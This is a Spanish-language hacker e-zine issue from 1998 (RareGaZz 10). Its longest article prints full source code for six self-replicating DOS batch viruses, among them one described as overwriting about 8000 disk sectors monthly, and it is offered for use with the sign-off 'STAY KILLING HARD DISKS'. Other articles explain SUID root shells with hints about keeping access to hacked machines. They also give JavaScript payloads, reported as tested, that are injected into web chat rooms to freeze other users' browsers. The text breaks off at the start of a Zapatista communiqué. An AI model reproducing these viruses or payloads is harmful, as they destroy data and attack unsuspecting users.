Copy Link
Add to Bookmark
Report

RareGaZz Issue 10

eZine's profile picture
Published in 
RareGaZz
 · 3 years ago

  

<<::RareGaZz::>>
"CyberHerejes"

Arkangel Azumlord Groovy
|KillerBot Orion Vov_77|
|GuyBrush RareTrip Mr.X|
y ServerHacker.Team 1998

Edicion: RareGaZz

Manual de Bolsillo electrico acondicionado y reforzado para ofrecer la
libertad de palabra en internet. El contenido esta creado totalmente por
personas ajenas a la editorial y su contenido es responsabilidad absoluta de
los escritores que lo hacen de manera anonima y no existe manera de conocer
sus identidades por lo que si no estas de acuerdo con los contenidos de
RareGaZz borra el archivo de tu sistema y calla boca. Swoish.

" En la ciudad de Mexico durante el Teleton: `¨Como estan?' -dice Lucero
y retorciendose en sus sillas contesta la audiencia: `­Discapacitados!' "


øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

Aqui de nuevo amigos cybernautas despues de un largo tiempo de reposo debido
a las fiestas navide¤as y a¤o nuevo. Queremos agradecer a los encargados del
dominio acapulco.uagro.mx que nos han prestado un sub-dominio en
http://raregazz.acapulco.uagro.mx asi como a los tipos fuertes de
http://islatortuga.com que nos han dado sus servicios gratuitamente unicamen-
te para ofrecer a ustedes este E-Zine.

ahora algo maniaco: RareGaZz cumple un a¤o en Febrero! Asi es, apenas estamos
saliendo del cascaron pero esperamos mejorar en todo para los siguientes
a¤os. Ustedes pensaran: 10 numeros en un a¤o?? Patetico! Y es cierto pero
¨que vamos a hacer?

Por favor actualicen sus paginas linkeando a RareGaZz a esta direccion:
http://www.visitweb.com/raregazz gracias.

Disfruten es para ustedes . . R4r37r1P & R4r3g4Z2 734/\/\
-Hackeando tu sistema-


y hasta pronto.
øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

VIRUS BATCH ! 1/2
PERMISOS DE ARCHIVOS EN UNIX
EMULADORES Y ROMS -LA ULTIMA AVENTURA-
HACKEANDO CHAT ROOMS DE HTML
COMUNICADO DEL EZLN SOBRE LA GUERRA EN CHIAPAS MEXICO
COMO MANDAR MENSAJES GRATIS DESDE UN MOVIL DIGITAL
SHELL ACCOUNTS DE UNIX GRATIS
COMO USAR GLIDE (CON QUE Y PARA QUE)
ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES
¨EXISTE LA ANONIMIDAD EN LA RED?
NAVEGANDO ANONIMAMENTE -SERVIDORES PROXIES-
COMANDO TOUCH DE UNIX
LAS POSIBILIDADES EN WINDOWS NT -PRIMERA PARTE-
MAS BICHOS EN INTERNET
RELIGION Y OTRAS COSAS INSERVIBLES
BUSCADORES EN INTERNET
WORLD WIDE WEB = EL MERCADO MAS GRANDE DEL MUNDO
UNIX SISTEM V INTERFACE DEFINITION (SVID)
LA GUIA PARA JODER CUALQUIER AUTOMOVIL
CRACKS - HACKS Y KAOS CON UN HEXEDITOR
NOTI-LOONZ
B 0 0 /\/\ 3 R 4 N G

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

*****************
* VIRUS BATCH ! * Por : -/| Yo Soy |\-
*****************
PARTE 1 DE 2


Introduccion:

Las personas generalmente creen que los virus batch no son una forma
confiable de infectar. Bueno. Te dejo que opines tu mismo con esto, es
cierto que unos virus no son chingones, pero aqui no es necesario saber de
algun lenguaje de programacion, solo debes de saber hacer archivos .bat. :)
Los virus se supone que son faciles de limpiar. :( Agarra un mendigo editor
y orale !

Aqui te pongo 5 virus que me econtre por ahi. Se supone que si sirven.

--------------------------- Caracteristicas ---------------------------

* Infectan unicamente archivos batch que no esten protegidos.
* No afectan el funcionamiento de los batch que infecta, se ejecutan
normalmente, pero el virus toma control de el despues de que el batch
acabo de hacer todas sus ejecuciones.
* Se necesita Ms-Dos 5 o mayor ( no se... :)


------------------------------- LOS VIRUS
-------------------------------

ZEP (165) - El virus mas peque¤o hasta ahora.

XOP (361) - Infecta 2 batchs por ejecucion.

POT (685) - Infecta 1 batch por ejecucion, si no puede infectar
ninguno, pone 2 bombas ANSI.

SKUL (497) - Este es un virus PELIGROSO ! XD, es el que mas me ha
gustado. Sobrescribe cerca de 8000 sectores del disco
duro el dia 20 de cada mes. TEN CUIDADO! ( no juegues
con fuego :)

ZOP_B (615) - Infecta 2 batchs por ejecucion. No es muy impresionante
no veras mucho despues de su ejecucion.

Las bombas ANSI solo funcionaran si ANSI.SYS esta cargado en el memoria.
Todos los virus excepto ZEP se mentienen con una copia en la raiz del
disco duro.

-------------------------------- ZEP.BAT
----------------------------------

@echo off%[ZeP]%
if not exist %0.bat goto ZeP
for %%f in (*.bat ..\*.bat) do set ZeP=%%f
find /i "ZeP"<%ZeP%>nul
if errorlevel 1 find "ZeP"<%0.bat>>%ZeP%
:ZeP

-------------------------------- XOP.BAT
----------------------------------

@echo off%[XoP]%
if '%XoP%=='11 goto XoP2
if '%2=='_ goto XoP1
if exist C:\XoP.bat goto XoP
if not exist %0.bat goto XoP2
find "XoP"<%0.bat>C:\XoP.bat
attrib C:\XoP.bat +h
:XoP
for %%v in (*.bat ..\*.bat) do call C:\XoP %%v _
set XoP=
goto XoP2
:XoP1
find /i "XoP"<%1>nul
if not errorlevel 1 goto XoP2
type C:\XoP.bat>>%1
set XoP=%XoP%1
:XoP2

-------------------------------- POT.BAT
----------------------------------

@echo off%_PoT%
if '%PoT%=='I goto PoTz
if '%1=='_ goto PoTi
if exist C:\PoT.bat goto PoT
if not exist %0.bat goto PoTz
find "PoT"<%0.bat>C:\PoT.bat
attrib C:\PoT.bat +h
:PoT Makes You Feel Goodz
for %%f in (*.bat ..\*.bat C:\*.bat) do call C:\PoT.bat _ %%f
if '%PoT%=='I goto PoTf
set PoT=
echo %PoT%[32;" Estas paralizado ! "p
echo %PoT%[96;" C:\PoT";13p%PoT%[2A
echo.%_PoT%|time|find "00">nul
if errorlevel 1 goto PoTf
echo %PoT%[1A%PoT%[s%PoT%[1;37;44m
echo %PoT%[3;9H Dejame salir de aqui ! %PoT%[0m%PoT%[u
:PoTf gold
set PoT=
goto PoTz
:PoTi nfect
find /i "PoT"<%2>nul
if not errorlevel 1 goto PoTz
type C:\PoT.bat>>%2
set PoT=I
:PoTz

---------------------------------- SKUL
-----------------------------------

:: [8mSKuL
@echo off%[SKuL]%
echo.|date|find "20">nul%[SKuL]%
if errorlevel 1 goto SKuL1
echo SKuL Fregando el disco duro...
::echo ° ¹ ™Í&Í>SKuL.com
::SKuL
:SKuL1 [6A2
if exist C:\SKuL goto SKuL2
if not exist %0.bat goto SKuL
find "SKuL"<%0.bat>C:\SKuL
attrib C:\SKuL +h
:SKuL2 [5A
set SKuL=C:\AUTOEXEC.BAT
for %%f in (D:*.bat C:*.bat ..\*.bat) do set SKuL=%%f
if not exist %SKuL% goto SKuL
find /i "SKuL"<%SKuL%>nul
if errorlevel 1 type C:\SKuL>>%SKuL%
set SKuL=
:SKuL [7A [0m

-------------------------------- ZOP_B.BAT
----------------------------------

@echo off
:: [8m --- [ZoP_B] Batch Infector ---
if '%2=='ZoP_ goto ZoP_1
if '%1=='ZoP_ echo ["`";"`"p
:: ["`";" ZoP_B ZoP_";13p
:: [4AZoP_
if exist c:\ZoP_B.bat goto ZoP_
if not exist %0.bat goto ZoP_2
echo @echo Off>c:\ZoP_B.bat
find "ZoP_"<%0.bat>>c:\ZoP_B.bat
attrib c:\ZoP_B.bat +h
:: [6AZoP_
:ZoP_
for %%v in (*.bat) do call c:\ZoP_B %%v ZoP_
if '%ZoP_%==' for %%v in (..\*.bat) do call c:\ZoP_B %%v ZoP_
set ZoP_=
goto ZoP_2
:: [6AZoP_
:ZoP_1
if '%ZoP_%=='11 goto ZoP_2
find "ZoP_"<%1>nul
if not errorlevel 1 goto ZoP_2
type c:\ZoP_B.bat>>%1
set ZoP_=%ZoP_%1
:ZoP_2
::ZoP_ [7A [0m

--------------------------------------------------------------------------

BATCH VIRUS REMOVER
===================

Este archivo limpiara los virus batch de los que vimos atras en el documento.
Basicamente, quita todas las lineas que contengan una cadena de caracteres
especifica provista por el archivo. Es inecesario el decir que si lo llamas
con la cadena de caracteres incorrecta reducira tus archivos batch a una puta
mierda :) , asi que ten cuidado, si no tienes la necesidad de usarlo, mejor.
Ha sido escrito para uso en Ms-Dos 6 o mayor, ( o por lo menos el arhivo
CHOICE.COM ), es requerido porque el removedor pide la confirmacion de cada
archivos antes de limpiarlo. Asi que tu no debes limpiar un archivo original
si no estas seguro.

Para usarlo, ( yo no lo he usado, asi que no me hago responsable :),
determina que tipo de cadena de caracteres quieres limpiar, por ejemplo: Si
yo tengo el un virus batch que contenga 'GreeZ' en cada linea ( aqui voy otra
vez ) como lo siguiente:

::
:: Archivo infectado
::
ctty nul%_GeeZ%
for %%a in (C:*.bat ..\*.bat) do set GeeZ=%%a
find "GeeZ"<%GeeZ%
if errorlevel 1 find "GeeZ"<%0.BAT>>%GeeZ%
ctty con%_GeeZ%

Para remover eso, solo pon "CLEANBAT GeeZ".

---------------------------- CLEANBAT.BAT
----------------------------------
@echo off
if '%1=='%temp% goto remove
if exist C:\DOS\CHOICE.COM goto start
echo Este archivo necesita CHOICE.COM en C:\DOS!
:start
echo **** REMOVEDOR DE VIRUS BATCH ****
echo.
echo Cuidado! Si la llave no es unica destruira archivos!
echo Sintax: CLEANBAT llave1 [llave2] donde llave1 es la llave
echo UNICA que identificara al virus.
echo.
set ks=%1
set is=%2
if '%ks%==' goto exit
if '%is%==' set is=%ks%
if '%temp%==' set temp=C:\
echo Proceder a remover %ks% de archivos que contienen %is%. Si?
choice /c:yn>nul
if errorlevel 2 goto exit
for %%v in (*.bat) do call %0 %temp% %%v
if exist rem$$_ del rem$$_
goto exit
:remove
find "%is%"<%2>nul
if errorlevel 1 goto done
echo Found in %2 - remove?
choice /c:yn>nul
if errorlevel 2 goto done
find /v "%ks%"<%2>rem$$_
copy rem$$_ %2>nul
goto done
:exit
set is=
set ks=
:done

Otra forma de limpiar archivos bat infectados por un virus batch es cargar
el archivo en un editor ( como el edit de ms-dos ) e ir quitando las lineas
a¤adidas al programa, recuerda que hay unos que tiene una copia la raiz con
el atributo de ocultos, solo usa ATTRIB filename -s -r -h y eliminalos.

Despedida:

Ha ! Estos 5 virus se me hacen un poco peque¤os y casi inofensivos.
Este esta mejor, que lo disfruten...

----------------------( VIRUS MELT_ )------------------------------

@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
@echo off
echo Hello World!
::---- end dummy host ----

@goto MeLTend [MeLT_2a]
:MeLTbeg
@echo off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
echo.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
echo e 120 B4 4C CD 21 00>>MeLT.t
echo g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend

----------------------------( FIN )-----------------------------------

Originalmente en : Batch file viruses tutor 1.
Ok , eso es todo por hoy.... STAY KILLING HARD DISKS !!

Traduccion y adaptado por: -/| Yo Soy |\- mierda@hotmail.com

\/|R|| !

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

PERMISOS Y PROPIETARIOS DE ARCHIVOS EN UNIX
============================================

Todos los archivos y directorios en los Unix's tienen propietarios y permisos,
es la base de la seguridad de archivos del sistema. Se pueden cambiar los
permisos y los propietarios para restar o agregar restricciones de acceso.
Los permisos son tambien los que definen si un archivo se puede ejecutar como
un comando.
cuando tipeamos ls -l vemos algo como esto:

-rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba*
drwx------ 2 vorax users 1024 Dec 12 00:02 tmp/

El primer campo es el que indica los permisos (-rwxr-x---). Tambien vemos que
"vorax" es el *usuario* propietario del archivo y "users" es el *grupo*
propietario.
/tmp es un directorio, el primer caracter de los permisos es una "d".
Estos son los caracteres que pueden aparecer al principio de los permisos:

Caracter Significado
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ - | Archivo comun ³
³ d | Directorio ³
³ b | Block Device (disco,CD-ROM,etc) ³
³ l | Symbolic Link (BSD o V.4) ³
³ s | Socket (BSD o V.4) ³
³ = | FIFO (System V, Linux) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Los permisos se interpretan asi:

Son 10 caracteres, si quitamos el primero que es el que indica el tipo de
archivo nos quedan 9 que se agrupan de a tres:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ propietario grupo otros usuarios ³
³ (owner) (group) (others) ³
³ | rwx | | r-x | | --- | ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
r= read-lectura w= write-escritura x=eXecute-ejecucion

Con estos datos sabemos que el usuario propietario del archivo (owner) puede
leer(r), escribir(w) y ejecutar(x). Los miembros del grupo propietario pueden
leerlo(r) y ejecutarlo(x). Los otros usuarios no pueden hacer nada (---)

En el caso del directorio (/tmp):
(drwx------)
En un directorio los caracteres se interpretan asi:
r= Permite ver el contenido del directorio con ls.
w= Se pueden crear, mover o borrar archivos dentro del directorio.
x= Se puede acceder al directorio mediante cd.
Lo mas comun para un directorio es r-x o rwx.


Modo numerico
-------------
Los permisos pueden representarse con tres numeros octales (base 8) (ej:664)
y podemos usar el modo numerico para cambiar los permisos a un archivo.
El primer digito indica los privilegios del propietario, el segundo los del
grupo y el tercero los de los otros usuarios. Cada digito se obtiene sumando
todos los privilegios (rwx) de cada propietario (owner,group,others): Cada
privilegio es un bit de un grupo de 3, su valor posicional si valen 1:
r=4 w=2 x=1
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Volviendo a nuestro ejemplo (-rwxr-x---)
³owner = rwx = 4+2+1 = 7 ³ la codificacion numerica es 750 y este numero
³group = r-x = 4+1 = 5 ³ se obtiene de la forma que se muestra en la figura.
³other = --- = 0 ³ Si tomamos cada digito octal como un numero de tres
³ 750³ digitos binarios. Y si consideramos que si el
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ permiso esta habilitado es 1 y si no 0, entonces
r-x seria 101 en binario, en decimal 4+0+1=5,y obtenemos un digito del permiso
octal.
Los mas comunes son : 0,1,4,5,6,7 y en los tres casos: 600 750 640 644
SUID: 4000 SGID: 2000 (ver mas adelante)

CAMBIAR PERMISOS (comando chmod)
--------------------------------

Cuando creamos un archivo nos convertimos en sus propietarios y podemos
cambiar los permisos de este mediante el comando "chmod"

<=SOLO EL PROPIETARIO PUEDE CAMBIAR LOS PERMISOS=>

La sintaxis es: chmod <especificacion> archivo_o_directorio

Hay dos formas de cambiar los permisos: en forma numerica o con codigos de
letras.

=Modo numerico=

(en el prompt del UNIX)
unix:~$ ls -l prueba
-rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba*

unix:~$chmod 511 prueba
unix:~$ls -l prueba
-r-x--x--x 1 vorax users 65 Dec 13 15:59 prueba*

unix:~$chmod 710 prueba
unix:~$ls -l prueba
-rwx--x--- 1 vorax users 65 Dec 13 15:59 prueba*

Aunque al principio puede parecer dificil, posiblemente el modo numerico
sea el que mas uses. Arriba explico como se obtiene el numero.

=Modo simbolico=

La sintaxis es: chmod [ugoa...][=-+][rwxXstugo][...] pueden hacerse
multiples operaciones simbolicas separadas por comas.

1) Primero debemos especificar que permisos queremos modificar mediante una
letra: u= los del propietario (user)
g= los del grupo (group)
o= los de los otros (other)
a= los de todos (ugo)
2) Debemos indicar si agregamos o sacamos un permiso, + y - respectivamente
o si lo modificamos, signo =

3)Indicamos los permisos mediante el codigo de letras.
Ejemplo, para agregar el permiso de lectura para el grupo y los otros:

unix:~$ chmod go+r

otros ejemplos :
unix:~$ ls -l prueba
-rwxr-x--- 1 vorax users 65 Dec 13 15:59 prueba*

unix:~$ chmod u-w,g-r,o+x prueba
unix:~$ ls -l prueba
-r-x--x--x 1 vorax users 65 Dec 13 15:59 prueba*

unix:~$ chmod u+w,o-x prueba
unix:~$ ls -l prueba
-rwx--x--- 1 vorax users 65 Dec 13 15:59 prueba*

unix:~$chmod a+x,u-rw prueba
unix:~$ ls -l prueba
---x--x--x 1 vorax users 5 Dec 13 15:59 prueba*

NOTAS

Estos comandos son equivalentes: chmod ugo+rx =igual a= chmod a+rx

Se pueden usar comodines: chmod a-r *sec* (saca permiso de lectura a todos
los archivos que tengan "sec" en su nombre: seco.txt casiseco.txt,etc)

Varios archivos a la ves: chmod a+x zap.x wedit.x

Recursivamente (como attrib /s en DOS) chmod a-r * -R (saca permiso de lectura
a todos los archivos y directorio del directorio actual y subdirectorios)

Si un directorio tiene permiso de escritura para todos (chmod o+w) cualquiera
puede borrar los archivos que esten adentro sin importar los permisos.

Cualquiera con permisos de lectura puede copiar el archivo. El propietario
de la copia es el que la copio.

Chmod no cambia los permisos de un link, si no del archivo al que este apunta.

SUID y GUID
===========

Hay casos en que un usuario comun necesita tener privilegios. Por ejemplo
el programa passwd que permite cambiar el password de un un usuario necesita
escribir en /etc/passwd, y un usuario comun no tiene privilegios para hacerlo.
Para solucionar esto UNIX permite que un programa se 'encubra' bajo la
identidad de su propietario, asumiendo un UID o GID distinto al del usuario
que lo ejecuto. Un programa que puede hacer esto se denomina SUID o SGID.
Cuando un programa SUID se ejecuta, el "effective UID" (EUID) es el del
propietario del archivo, aunque el usuario que lo ejecuto sea otro.
Si seteamos los bits de permiso suid o sgid a un archivo ejecutable, otros
usuarios pueden tener acceso a los mismos recursos (mediante el ejecutable)
que los propietarios reales. Ejemplo:

el programa cat que se encuentra generalmente en /bin nos permite ver el
contenido de un archivo al que tenemos acceso de lectura:

unix:~$ cat /etc/passwd
root:KQc4YhmF6pc6X:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
[sigue]

Los permisos normales de /bin/cat son:
unix:~$ls -l /bin/cat
-rwxr-xr-x 1 root bin 7737 Aug 6 1995 /bin/cat*

SI SOMOS ROOT PODEMOS HACER ESTO:

unix:~$chmod u+s /bin/cat (agregamos suid a /bin/cat)
unix:~$ls -l /bin/cat
-rwsr-xr-x 1 root bin 7737 Aug 6 1995 /bin/cat*
( ^-la x de ejecucion fue reemplazada por una "s")

Entonces cada vez que un usuario usa "cat" toma momentaneamente la identidad
de su propietario (root) por lo tanto puede leer cualquier archivo aunque
no tenga permisos reales (si de Carlos) para hacerlo. :)
Si seteamos suid un shell tenemos acceso de root como si entramos con login
y password: (HAY QUE SER ROOT PARA HACER ESTO)

unix:~$cp /bin/sh ./rootsh
unix:~$chmod u+s rootsh
unix:~$ls -l rootsh
-rwsr-xr-x 1 root users 299649 Dec 13 18:56 rootsh*
unix:~$rootsh
unix:~# (somos root :)

Si rootsh tuviera estos permisos:
-rwsr-sr-x 1 juan clientes 299649 Dec 13 18:56 rootsh*
Tomariamos la identidad de "juan" y el grupo "clientes", aunque realmente
fueramos "carlos" del grupo "users".

NOTAS

Si encontramos un archivo suid escribible por nosotros es suficiente para
ganarse el r00t.

No les recomiendo dejar shells suid root en los lugares que hakean como
forma para volver a entrar, muchas utilidades de seguridad los detectan
y hay mejores metodos para asegurarse el reingreso.

Estos comandos son equivalentes: chmod a+x,u+s =igual a= chmod 4111
chmod a+x,g+s =igual a= chmod 2111
chmod u+s,g+s =igual a= chmod 6111

Sticky Bit= si la ultima x de un archivo es un "t" el programa
es Sticky. Esta permiso en archivos es obsoleto pero se usa en directorios.

Este comando muestra todos los SUID find / -type f -perm +u+s -ls

Si un archivo es SUID o SGID pero no ejecutable (!) se ve una S mayuscula
prueben!.

CAMBIAR PROPIETARIOS (chown,chgrp)
---------------------------------
Para cambiar el grupo o usuario propietario de un archivo, se debe ser
"due¤o" del mismo, o root. Para cambiar el grupo se debe pertenecer a el.

Sintaxis:
Cambiar grupo : chgrp <grupo> archivo
Cambiar 'owner': chown <usurio> archivo

Ejemplos:
unix:~$chown vorax .hosts_n (cambio el propietario del archivo .hosts_n)
unix:~$chgrp users .hosts_n (cambio el grupo propietario del archivo)
unix:~$chown vorax * (todos los archivos del directorio)
unix:~$chown vorax .titbax prueba ckd.c (varios archivos)

Si usamos los numeros UID o GID:
unix:~$chown 501 .rare.txt (507 es el UID del usuario)
unix:~$chgrp 100 .rare.txt (100 es GID del grupo)

Todo junto:
chown usuario:grupo archivo

unix:~$chown juan:users juan.txt (setea usuario:grupo de una vez)
unix:~$chown juan: (setea usuario y el grupo con el que esta logeado)

Y todas las combinaciones posibles...
Usen el comando id en cada uno de los ejemplos para entender mejor.
===========================================================================
<VoraX> 12/97 Bs As

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù


EMULADORES Y ROMS
= la ultima aventura =

Todos sabemos que en el mercado existen muchisimas consolas de videojuegos
que permiten jugar y entrener un rato pero cada una de estas con marcadas
diferencias. El caso de esto bien podria ser la comparacion entre el Sega
Genesis y el Nintendo 64, muchos de nosotros hemos jugado o tenemos uno de
estos aparatos pero ahora por internet, podemos tener los dos e incluso
muchos mas como el primer nintendo, el super nintendo, ahora ya los CD's de
playstation, Intellevision o la ultima consola de sega. Todas estas consolas
estan disponibles en internet.

Podemos usar estos sistemas gracias a los emuladores; aparatos que usando
software simulan el ambiente de otra computadora o de otro lenguaje de
programacion para ejecutar el codigo y ver los resultados en otro sistema que
en este caso seria, tu pc.

En un principio la emulacion era lenta y solo existian juegos para game boy
(recuerdan tetris? :) pero gracias a programadores que empezaron a
interesarse en la emulacion esta fue evolucionandose y lograr la emulacion
rapida de casi cualquier juego incluso aquellos que necesitan hardware
especial como el chip fx del star fox.

Existen muchos emuladores que pueden conseguirse en internet para emular
estos programas con diferencias en velocidad, sonido, etc. Ademas dependiendo
de la computadora que tengas sera el juego. Por ejemplo no intentes ejecutar
el emulador de Super Nintendo en una 486!

NESticle 0.43 (nueva version disponible en la pagina de RareGaZz) Es el mejor
emulador de el viejo Nintendo, debes tenerlo, la nueva version permite jugar
por modem -version windows-.

Genecyst es otro buen emulador de los creadores de Nesticle (BloodLust) este
emulador es el mejor de Genesis.

SNES9x con este programa podras jugar el Super Nintedo en tu PC pero con un
sonido malo y lento en algo menos de Pentium.

Los juegos o programas de estas consolas se conocen como ROMS y pueden ser
encontrados por todo internet obviamente estos juegos tienen derechos de
autor y por eso son ilegales. Nintendo comenzo a promorcionar los emuladores
con restricciones tipo shareware y que podian ser usados por unicamente
24 horas o ser borrados, asi nacio la idea y si nintendo podia copiar los
cartuchos a programas de PC, ¨por que no empezar a hacerlo?

Algunos Links

http://www.emulation.net/ Emulaciones para los Maqueros.

http://www.media.dsi.unimi.it/mame/ Emuladores "Arcade" para juegos de
maquinitas.

http://www4.ncsu.edu/~bwmott/www/2600/ Roms y Emuladores de Atari 2600

http://www.users.zetnet.co.uk/ahornby/v2600.html Mas Atari 2600

http://www.general.uwa.edu.au/u/darrins/2600/welcome.html ...Atari 2600

http://www.geocities.com/SiliconValley/9461/emulate.htm Atari 5200

http://www.komkon.org/fms/ColEm/ Colecovision

http://www.davesclassics.com/ Colecovision, etc.

http://www.komkon.org/fms/iNES/ Nintendo

http://users.uniserve.com/~thebrain/ Nintendo

http://thunderstrike.simplenet.com/Roms/index.html Nintendo

http://www.parallax.co.uk/%7Elmw/ Emuladores de Vectrex

Bueno ahora que ya tienen a las grandes compa¤ias de videojuegos por los
huevos... a jugar.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

HACKEANDO CHAT ROOMS DE HTML
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

que onda raza? Yo aqui, empezando en esto de la tecnologia. Alguien preguntaba
en el numero 5, como tomar poder de algun chat. Encontre un par de scripts,
que no he podido probar. Ahi les van:

1) <script language=javascript> for(i=1; i<2;){ alert("texto") }</script>

2) <script language=javascript>a=1; for(i=1; i<2;){a=a+1}</script>

El numero dos lo que provoca es un bucle que se repite a si mismo un numero
de veces determinado y que en tiempo se traduce en unos 30 ó 45 segundos
dependiendo del procesador de la maquina. Transcurrido este tiempo volvera a
salir otro mensaje esta vez del propio navegador y despues de este volvera a
la normalidad.
La ventaja de este programa es que mientras se esta leyendo el bucle, el
ordenador queda totalmente inoperativo y no se puede hacer nada de nada.
La desventaja es que en los futuros navegadores es posible que no se produzca
este bucle, las razones son tecnicas y no creo que valga la pena explicarlas
ademas del tiempo que nos llevaria. Y la otra desventaja es que dependiendo
del sistema operativo que se use se puede anular este bucle manualmente.

El numero uno lo que provoca es un bucle que se repite a si mismo e
indefinidamente haciendo imposible que se pueda salir de el, por lo que
el ordenador del usuario leera una y otra vez este bucle y no podra salir
de el. En el lugar donde se pone el texto sera el mensaje que le saldra al
usuario una y otra vez. Asi que sustituye el (texto) por el mensaje que
quieras. La ventaja de este programa es que el funcionamiento esta casi
garantizado ante la llegada de futuros navegadores mas modernos, y la
desventaja (aunque yo no diria desventaja) es que el ordenador no queda
totalmente inoperativo, lo unico que queda inoperativo es el navegador o
la ventana del navegador.

* IMPORTANTE: cuando escribas estos programas en el chat y pulses el
boton de enviar, estos se ejecutaran a todos los usuarios que esten
conectados (excepto en los chats que se pueden mandar a una sola persona)
en cualquiera de los dos casos, estos programas tambien se ejecutaran en
tu computadora, cosa que nos fastidiaria mucho porque tambien se nos
bloquearia a el ordenador a nosotros, entonces lo que se puede hacer son
muchas cosas, la mas sencilla es, o bien mirar en el Trumpet y vigilar a
ver cuando nuestro mensaje es enviado por el modem (cosa un poco
complicada si no se tiene un poco de idea), o bien pulsar el boton de
"Enviar" propio del chat y esperar a que la pantalla se ponga en blanco
(esto significa que se ha borrado toda la pantalla para cargarla de nuevo
con los mensajes actualizados) entonces pulsar Stop.

Un Saludo pa la banda y que les aproveche

Filo

[ Aqui en RareGaZz hemos probado los trucos con buenos resultados.En algunos
chats fue necesario incluir la etiqueta </XMP> o </PRE> antes del codigo
javascript. ]

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù


Comunicado del Comite Clandestino Revolucionario Indigena Comandancia General
del Ejercito Zapatista de Liberacion Nacional. Mexico.

23 de Diciembre de 1997.

Al pueblo de Mexico;
